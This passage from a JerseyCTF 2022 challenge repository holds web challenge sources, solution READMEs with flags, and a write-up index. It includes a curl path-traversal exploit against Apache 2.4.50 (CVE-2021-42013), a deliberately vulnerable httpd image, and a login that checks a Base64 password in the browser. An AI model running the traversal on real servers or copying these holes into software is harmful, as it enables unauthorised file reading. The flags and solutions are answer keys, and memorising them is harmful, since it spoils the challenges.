9 | "q2" => [ 10 | "q" => "What city was your high school located in?", 11 | "a" => "Rahway", 12 | ], 13 | "q3" => [ 14 | "q" => "What is your favorite sport?", 15 | "a" => "Arm wrestling" 16 | ] 17 | ]; 18 | 19 | function showFirstForm() 20 | { 21 | ?> 22 |
23 | 26 | 27 |
28 | 35 |

Security Questions

36 |
37 | $question) { ?> 39 | 42 |
43 | 44 | 45 |
46 | 52 | 55 | 60 | 63 | 64 | 65 | 66 | 67 | 68 | Forgot Password 69 | 70 | 71 | 72 |

Forgot Password

73 | 74 | $question) { 91 | if ($_POST[$question_id] !== $question["a"]) { 92 | $missed_question = $question; 93 | break; 94 | } 95 | } 96 | if ($missed_question === null) { 97 | showFirstForm(); 98 | scriptAlert(FLAG); 99 | } else { 100 | showSecondForm(); 101 | scriptAlert("Incorrect Answer(s)"); 102 | } 103 | } 104 | } else { 105 | showFirstForm(); 106 | } ?> 107 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /web/heres-my-password/index.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | 10 | 11 | Login 12 | 13 | 14 | 15 |

Login

16 |
17 | 20 |
21 | 24 |
25 | 26 |
27 | Forgot Password? 28 | 31 | 34 | 35 | 38 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /web/road-not-taken/README.md: -------------------------------------------------------------------------------- 1 | # road-not-taken 2 | 3 | ## Challenge Text 4 | * You've reached a fork in the road! Choose the right path to find your way to the flag. Start here: https://jerseyctf-road-not-taken.chals.io/ 5 | 6 | ## Hint 7 | * Recent CVEs may help you find your way. 8 | 9 | ## Solution 10 | * `curl -v --path-as-is https://jerseyctf-road-not-taken.chals.io/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/root/flag.txt` The challenge image is Apache httpd 2.4.50 (see the Dockerfile), which is affected by CVE-2021-42013, a path traversal left by the incomplete fix for CVE-2021-41773: `%%32%65` is a double URL-encoded `.`, which the 2.4.50 path check does not recognise as a dot segment, and `--path-as-is` keeps curl from collapsing the segments before sending. The issue is fixed in httpd 2.4.51 and is only reachable for paths not covered by `Require all denied`. 11 | 12 | * Flag: `jctf{CVE-2021-42013}` 13 | 14 | ## Credit 15 | * Developed by [Rob Bruder](https://github.com/njccicrob) 16 | -------------------------------------------------------------------------------- /web/road-not-taken/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM vulhub/httpd:2.4.50 2 | 3 | COPY flag.txt /root 4 | 5 | COPY httpd.conf /usr/local/apache2/conf/ 6 | 7 | COPY index.html /usr/local/apache2/htdocs/ 8 | 9 | COPY jerseyctfiilogowithtext.png /usr/local/apache2/htdocs/ 10 | 11 | RUN chmod a+x /root 12 | 13 | EXPOSE 8080 14 | -------------------------------------------------------------------------------- /web/road-not-taken/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | jctf{CVE-2021-42013} 2 | -------------------------------------------------------------------------------- /web/road-not-taken/challenge/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |

Welcome to JerseyCTF 2!

6 | jerseyctflogo 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /web/road-not-taken/challenge/jerseyctfiilogowithtext.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/web/road-not-taken/challenge/jerseyctfiilogowithtext.png -------------------------------------------------------------------------------- /web/seigwards-secrets/README.md: -------------------------------------------------------------------------------- 1 | # seigwards-secrets 2 | 3 | ## Challenge Text 4 | 5 | * Seigward has been storing his secrets on his website https://jerseyctf.co for decades. Hasn't failed him yet. 6 | 7 | ## Hint 8 | 9 | * Where can you find a website's code? 10 | 11 | ## Solution 12 | 13 | * The password, which is the flag, is stored in the website's client-side source code (`login.js`), encoded in base64. Base64 is a reversible encoding, not encryption or hashing, so anyone who can view the page source can recover the password. All you need to do is find it and decode it. 14 | * Flag: `jctf{1M_s0_1M_5o_Dyn4Mit3_092478}` 15 | 16 | ## Credit 17 | 18 | * Developed by [Rajat Patel](https://github.com/PAndaContron/) and [Yousef Attia](https://github.com/YousefAttia-git/) 19 | -------------------------------------------------------------------------------- /web/seigwards-secrets/challenge/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | Seigwards secrets ;) 10 | 27 | 28 | 29 | 30 |
31 |
32 |
33 | 37 |
38 |
39 | 40 | 41 | 44 | 45 | 48 | 49 | 52 | 53 | 54 | 57 | 58 | 59 |
60 | 62 | 63 |
64 | 65 | 66 |
67 | 69 | 70 |
71 | 72 | 73 | 74 | 82 | 83 |
84 | 86 | 88 |
89 | 90 |
91 |
92 |
93 |
94 |
95 | 96 |
97 | Copyright © 2022. All rights reserved. 98 |
99 | 100 | 101 | 102 | 116 | 117 |
118 |
119 | 120 | -------------------------------------------------------------------------------- /web/seigwards-secrets/challenge/login.js: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* checkCreds(usr, pass): shows one of three alert() messages. When usr contains the substring "admin" and btoa(pass) equals the hard-coded Base64 string, the "My Secrets" message is shown; a non-matching password shows "nice try Derrick"; a username without "admin" shows "You fool!". NOTE(review): the comparison runs in the browser, so the expected value is delivered to every visitor, and Base64 is a reversible encoding rather than a hash; a real credential check belongs on the server, against a salted password hash. */ function checkCreds(usr, pass){ 4 | 5 | if(usr.includes("admin")){ 6 | if(btoa(pass) === "amN0ZnsxTV9zMF8xTV81b19EeW40TWl0M18wOTI0Nzh9"){ 7 | alert("My Secrets: 1. I count in my sleep, 2. I hav") 8 | } 9 | else{ 10 | alert("nice try Derrick") 11 | } 12 | } 13 | else{ 14 | alert("You fool!") 15 | } 16 | 17 | } 18 | 19 | /* login(): reads the values of the elements with ids form3Example3 and form3Example4 and passes them to checkCreds. NOTE(review): usr and pass are assigned without var/let/const, so unless the script runs in strict mode they become implicit globals. */ function login(){ 20 | usr = document.getElementById('form3Example3').value 21 | pass = document.getElementById('form3Example4').value 22 | checkCreds(usr,pass) 23 | } -------------------------------------------------------------------------------- /writeups/README.md: -------------------------------------------------------------------------------- 1 | # Write-ups 2 | * This is a place that one can input their solutions to solving a challenge! 3 | 4 | --- 5 | 6 | ## To Contribute 7 | * Check out [Contribution Guide](../.github/contributing.md) 8 | 9 | --- 10 | 11 | ## Sites / Others 12 | 13 | | name/handle | Description / URl 14 | | :--- | :--: 15 | | CTFtime Writeups | https://ctftime.org/event/1590/tasks/ 16 | 17 | --- 18 | ## Contributor write 19 | 20 | ## Bin 21 | - [bin](../bin) 22 | 23 | | Challenge | Write-ups 24 | | :----: | :---- 25 | | [block-game](../bin/block-game) | [writeups](block-game) 26 | | [context-clues](../bin/context-clues) | [writeups](context-clues) 27 | | [going_over](../bin/going_over) | [writeups](going_over) 28 | | [kangaroo](../bin/kangaroo) | [writeups](kangaroo) 29 | | [misdirection](../bin/misdirection) | [writeups](misdirection) 30 | | [patches](../bin/patches) | [writeups](patches) 31 | | [symbolism](../bin/symbolism) | [writeups](symbolism) 32 | | [win-bin-analysis](../bin/win-bin-analysis) | [writeups](win-bin-analysis) 33 | 34 | ### Crypto 35 | - [Crypto](../crypto) 36 | 37 | | Challenge | 
Write-ups 38 | | :----: | :---- 39 | | [audio-transmission](../crypto/audio-transmission) | [writeups](audio-transmission) 40 | | [file-zip-cracker](../crypto/file-zip-cracker) | [writeups](file-zip-cracker) 41 | | [hidden-in-plain-sight](../crypto/hidden-in-plain-sight) | [writeups](hidden-in-plain-sight) 42 | | [inDEStructible](../crypto/inDEStructible) | [writeups](inDEStructible) 43 | | [new-algorithm](../crypto/new-algorithm) | [writeups](new-algorithm) 44 | | [salad](../crypto/salad) | [writeups](salad) 45 | | [secret-message](../crypto/secret-message) | [writeups](secret-message) 46 | | [would-you-wordle](../crypto/would-you-wordle) | [writeups](would-you-wordle) 47 | | [xoracle](../crypto/xoracle) | [writeups](xoracle) 48 | 49 | 50 | ### Forensics 51 | - [Forensics](../forensics) 52 | 53 | | Challenge | Write-up 54 | | :--: | :-- 55 | | [corrupted-file](../forensics/corrupted-file) | [writeups](corrupted-file) 56 | | [data-backup](../forensics/data-backup) | [writeups](data-backup) 57 | | [infected](../forensics/infected) | [writeups](infected) 58 | | [recent-memory](../forensics/recent-memory) | [writeups](recent-memory) 59 | | [scavenger-hunt](../forensics/scavenger-hunt) | [writeups](scavenger-hunt) 60 | | [speedy-at-midi](../forensics/speedy-at-midi) | [writeups](speedy-at-midi) 61 | | [stolen-data](../forensics/stolen-data) | [writeups](stolen-data) 62 | 63 | ## Misc 64 | - [Misc](../misc) 65 | 66 | | Challenge | Write-ups 67 | | :----: | :---- 68 | | [bank-clients](../misc/bank-clients) | [writeups](bank-clients) 69 | | [check-the-shadows](../misc/check-the-shadows) | [writeups](check-the-shadows) 70 | | [dnsmasq-ip-extract](../misc/dnsmasq-ip-extract) | [writeups](dnsmasq-ip-extract) 71 | | [filtered-feeders](../misc/filtered-feeders) | [writeups](filtered-feeders) 72 | | [firewall-rules](../misc/firewall-rules) | [writeups](firewall-rules) 73 | | [root-me](../misc/root-me) | [writeups](root-me) 74 | | [snort-log](../misc/snort-log) | 
[writeups](snort-log) 75 | | [we-will](../misc/we-will) | [writeups](we-will) 76 | 77 | 78 | ## OSINT 79 | - [OSINT](../osint) 80 | 81 | | Challenge | Write-ups 82 | | :----: | :---- 83 | | [contributor](../osint/contributor) | [writeups](contributor) 84 | | [dns-joke](../osint/dns-joke) | [writeups](dns-joke) 85 | | [mystery](../osint/mystery) | [writeups](mystery) 86 | | [photo-op-spot](../osint/photo-op-spot) | [writeups](photo-op-spot) 87 | | [rarity](../osint/rarity) | [writeups](rarity) 88 | | [sho-me-whats-wrong](../osint/sho-me-whats-wrong) | [writeups](sho-me-whats-wrong) 89 | 90 | 91 | ## Web 92 | * [Web](../web) 93 | 94 | | Challenge | Write-ups 95 | | :----: | :---- 96 | | [apache-logs](../web/apache-logs) | [writeups](apache-logs) 97 | | [buster](../web/buster) | [writeups](buster) 98 | | [cookie-factory](../web/cookie-factory) | [writeups](cookie-factory) 99 | | [flag-vault](../web/flag-vault) | [writeups](flag-vault) 100 | | [heres-my-password](../web/heres-my-password) | [writeups](heres-my-password) 101 | | [road-not-taken](../web/road-not-taken) | [writeups](road-not-taken) 102 | | [seigwards-secrets](../web/seigwards-secrets) | [writeups](seigwards-secrets) 103 | 104 | 105 | 131 | -------------------------------------------------------------------------------- /writeups/apache-logs/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/apache-logs/.keep -------------------------------------------------------------------------------- /writeups/audio-transmission/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/audio-transmission/.keep -------------------------------------------------------------------------------- /writeups/bank-clients/.keep: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/bank-clients/.keep -------------------------------------------------------------------------------- /writeups/block-game/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/block-game/.keep -------------------------------------------------------------------------------- /writeups/buster/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/buster/.keep -------------------------------------------------------------------------------- /writeups/check-the-shadows/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/check-the-shadows/.keep -------------------------------------------------------------------------------- /writeups/context-clues/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/context-clues/.keep -------------------------------------------------------------------------------- /writeups/contributor/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/contributor/.keep -------------------------------------------------------------------------------- /writeups/cookie-factory/.keep: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/cookie-factory/.keep -------------------------------------------------------------------------------- /writeups/corrupted-file/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/corrupted-file/.keep -------------------------------------------------------------------------------- /writeups/data-backup/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/data-backup/.keep -------------------------------------------------------------------------------- /writeups/dns-joke/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/dns-joke/.keep -------------------------------------------------------------------------------- /writeups/dnsmasq-ip-extract/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/dnsmasq-ip-extract/.keep -------------------------------------------------------------------------------- /writeups/file-zip-cracker/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/file-zip-cracker/.keep -------------------------------------------------------------------------------- /writeups/filtered-feeders/.keep: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/filtered-feeders/.keep -------------------------------------------------------------------------------- /writeups/firewall-rules/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/firewall-rules/.keep -------------------------------------------------------------------------------- /writeups/flag-vault/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/flag-vault/.keep -------------------------------------------------------------------------------- /writeups/going_over/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/going_over/.keep -------------------------------------------------------------------------------- /writeups/heres-my-password/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/heres-my-password/.keep -------------------------------------------------------------------------------- /writeups/hidden-in-plain-sight/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/hidden-in-plain-sight/.keep -------------------------------------------------------------------------------- 
/writeups/inDEStructible/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/inDEStructible/.keep -------------------------------------------------------------------------------- /writeups/infected/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/infected/.keep -------------------------------------------------------------------------------- /writeups/kangaroo/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/kangaroo/.keep -------------------------------------------------------------------------------- /writeups/misdirection/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/misdirection/.keep -------------------------------------------------------------------------------- /writeups/mystery/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/mystery/.keep -------------------------------------------------------------------------------- /writeups/new-algorithm/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/new-algorithm/.keep -------------------------------------------------------------------------------- /writeups/patches/.keep: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/patches/.keep -------------------------------------------------------------------------------- /writeups/photo-op-spot/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/photo-op-spot/.keep -------------------------------------------------------------------------------- /writeups/rarity/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/rarity/.keep -------------------------------------------------------------------------------- /writeups/recent-memory/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/recent-memory/.keep -------------------------------------------------------------------------------- /writeups/road-not-taken/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/road-not-taken/.keep -------------------------------------------------------------------------------- /writeups/root-me/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/root-me/.keep -------------------------------------------------------------------------------- /writeups/salad/.keep: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/salad/.keep -------------------------------------------------------------------------------- /writeups/scavenger-hunt/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/scavenger-hunt/.keep -------------------------------------------------------------------------------- /writeups/secret-message/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/secret-message/.keep -------------------------------------------------------------------------------- /writeups/seigwards-secrets/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/seigwards-secrets/.keep -------------------------------------------------------------------------------- /writeups/sho-me-whats-wrong/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/sho-me-whats-wrong/.keep -------------------------------------------------------------------------------- /writeups/snort-log/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/snort-log/.keep -------------------------------------------------------------------------------- /writeups/speedy-at-midi/.keep: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/speedy-at-midi/.keep -------------------------------------------------------------------------------- /writeups/stolen-data/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/stolen-data/.keep -------------------------------------------------------------------------------- /writeups/symbolism/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/symbolism/.keep -------------------------------------------------------------------------------- /writeups/we-will/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/we-will/.keep -------------------------------------------------------------------------------- /writeups/win-bin-analysis/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/win-bin-analysis/.keep -------------------------------------------------------------------------------- /writeups/would-you-wordle/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/would-you-wordle/.keep -------------------------------------------------------------------------------- /writeups/xoracle/.keep: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/xoracle/.keep --------------------------------------------------------------------------------